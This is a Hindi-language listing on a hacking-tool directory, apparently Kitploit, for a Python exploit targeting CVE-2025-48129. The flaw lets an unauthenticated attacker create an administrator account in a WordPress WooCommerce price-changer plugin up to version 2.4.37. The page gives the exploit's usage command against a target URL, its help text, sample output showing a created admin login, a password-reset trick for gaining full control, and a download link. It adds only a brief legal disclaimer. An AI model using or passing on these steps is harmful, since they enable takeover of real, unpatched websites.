Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-48129 — WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 विशेषाधिकार वृद्धि (Privilege Escalation) के प्रति संवेदनशील है। | Kitploit
उपकरण/GitHubGitHub/nxploited/cve-2025-48129
विशेषाधिकार वृद्धिभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubnxploited/cve-2025-48129

CVE-2025-48129

WordPress Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light Plugin <= 2.4.37 विशेषाधिकार वृद्धि (Privilege Escalation) के प्रति संवेदनशील है।

रिपॉजिटरी देखें
111 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

🚨 CVE-2025-48129 - WordPress Spreadsheet Price Changer प्लगइन में विशेषाधिकार वृद्धि

🛡️ भेद्यता सारांश

  • प्रभावित प्लगइन: Spreadsheet Price Changer for WooCommerce and WP E-commerce – Light
  • असुरक्षित संस्करण: <= 2.4.37
  • पैच किया गया संस्करण: ❌ कोई आधिकारिक समाधान उपलब्ध नहीं
  • खोजकर्ता: Patchstack | 20 मई 2025
  • CVE आईडी: CVE-2025-48129
  • CVSS स्कोर: 9.8 (Critical)
  • पैच प्राथमिकता: 🔴 उच्च

🔥 जोखिम

बिना प्रमाणीकरण के हमलावर बिना किसी पूर्व पहुँच के Administrator-स्तर का खाता बनाकर विशेषाधिकार बढ़ा सकते हैं। इससे WordPress साइट का पूर्ण नियंत्रण संभव हो जाता है।

इसके अंतर्गत वर्गीकृत: OWASP A7 – पहचान और प्रमाणीकरण विफलताएँ


🧪 एक्सप्लॉइट स्क्रिप्ट अवलोकन

यह Python स्क्रिप्ट प्लगइन के असुरक्षित संस्करणों को लक्षित करती है और केवल ईमेल तथा पासवर्ड (MD5 के माध्यम से हैश किया गया) का उपयोग करके एक नया WordPress Administrator पंजीकृत करती है।


▶️ उपयोग उदाहरण

root@kitploit:~
python CVE-2025-48129.py -u http://target-site.com/wordpress -mail [email protected] -p nxploitadmin

📘 उपयोग सहायता

root@kitploit:~
python CVE-2025-48129.py -help

usage: CVE-2025-48129.py [-h] -u URL -mail MAIL [-p PASSWORD]

CVE-2025-48129 - Unauthenticated Privilege Escalation Exploit by Khaled Alenazi (Nxploited)

options:
  -h, --help              show this help message and exit
  -u, --url URL           Target WordPress site URL (e.g., http://site.com/)
  -mail, --mail MAIL      Email for the new Admin account
  -p, --password PASSWORD Password to set (default: nxploitadmin)

✅ सफल आउटपुट उदाहरण

root@kitploit:~
[*] Checking plugin version...
[*] Plugin version: 2.4.37
[*] Vulnerable version detected. Exploiting...
[+] Exploitation successful!

[*] Login credentials:
    Username: [email protected]
    Password: 21232f297a57a5a743894a0e4a801fc3

[*] If login fails, reset the password manually via:
    http://target-site.com/wordpress/wp-login.php?action=lostpassword

⚠️ महत्वपूर्ण नोट

कुछ मामलों में, चुने गए पासवर्ड से सीधे लॉगिन करना विफल हो सकता है।
यह एक्सप्लॉइट में कोई बग नहीं है, बल्कि इस बात का परिणाम है कि असुरक्षित प्लगइन हैश किए गए पासवर्ड को WordPress की आंतरिक उपयोगकर्ता निर्माण प्रणाली को कैसे भेजता है।

यदि आप लॉगिन करने में असमर्थ हैं, तो निम्न URL का उपयोग करके ईमेल के माध्यम से पासवर्ड रीसेट करें:

root@kitploit:~
http://target-site.com/wordpress/wp-login.php?action=lostpassword

WordPress आपके द्वारा अभी बनाए गए Admin खाते को पासवर्ड रीसेट ईमेल भेजेगा — जिससे आपको पूर्ण पहुँच मिल जाएगी।


🧾 कानूनी अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत पेनिट्रेशन टेस्टिंग उद्देश्यों के लिए प्रदान किया गया है।
लेखक इस स्क्रिप्ट के दुरुपयोग या क्षति के लिए कोई ज़िम्मेदारी नहीं लेता है।


द्वारा: Nxploited ( Khaled_alenazi )

टूल डाउनलोड करें